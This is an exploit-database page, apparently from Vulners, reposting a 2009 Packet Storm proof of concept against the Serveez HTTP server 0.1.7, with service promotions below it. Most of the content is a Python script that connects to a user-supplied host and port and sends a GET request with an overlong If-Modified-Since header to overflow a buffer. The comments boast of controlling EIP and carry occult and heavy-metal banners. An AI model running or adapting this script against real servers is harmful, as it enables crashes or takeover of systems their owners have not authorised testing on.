Lucene search
K

Serveez 0.1.7 Buffer Overflow

🗓️ 06 Aug 2009 00:00:00Reported by Lord Venom AntiChristType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 37 Views

Serveez 0.1.7 Buffer Overflow, Remote Buffer Overflow POC, HTTP 1.0

Code
`#!/usr/bin/env python  
#  
# (,_ ,_, _,) SERVEEZ (HTTP SERVER) <= 0.1.7 (,_ ,_, _,)  
# /|\`-._( )_.-'/|\ REMOTE BUFFER OVERFLOW POC /|\`-._( )_.-'/|\  
# / | \`'-/ \-'`/ | \ AUTHOR: LORD VENOM ANTICHRIST / | \`'-/ \-'`/ | \  
# / |_.'-.\ /.-'._| \ <[email protected]> / |_.'-.\ /.-'._| \  
# /_.-' " `-._\ GRETZ TO ALL HEAVY METAL MUSIC /_.-' " `-._\  
#  
  
import sys, socket  
  
try:  
host = sys.argv[1]  
port = int(sys.argv[2]) # OFTEN 42422  
path = sys.argv[3] # MUST EXIST  
except:  
print "LAMER"  
exit(1)  
  
soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
try:  
soc.connect((host, port))  
req = "GET " + path + " HTTP/1.0\r\nIf-Modified-Since: " + ("A" * 50) + "\r\n\r\n"  
# WE RULE OVER EIP! (EVIL INCARNATE PENTAGRAM)  
soc.send(req)  
print "DONE"  
satan = 666  
except:  
print "CAN'T CONNECT"  
exit(2)  
  
exit(0)  
  
# ,  
# (@|  
# ,, ,)|_____________________________________  
# //\\8@8@8@8@8@8 / _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ \ OBEY THE MERCYLESS SWORD  
# \\//8@8@8@8@8@8 \_____________________________________/ OF SATANIC METAL POWER  
# `` `)|  
# (@|  
# `  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Aug 2009 00:00Current
0.9Low risk
Vulners AI Score0.9
37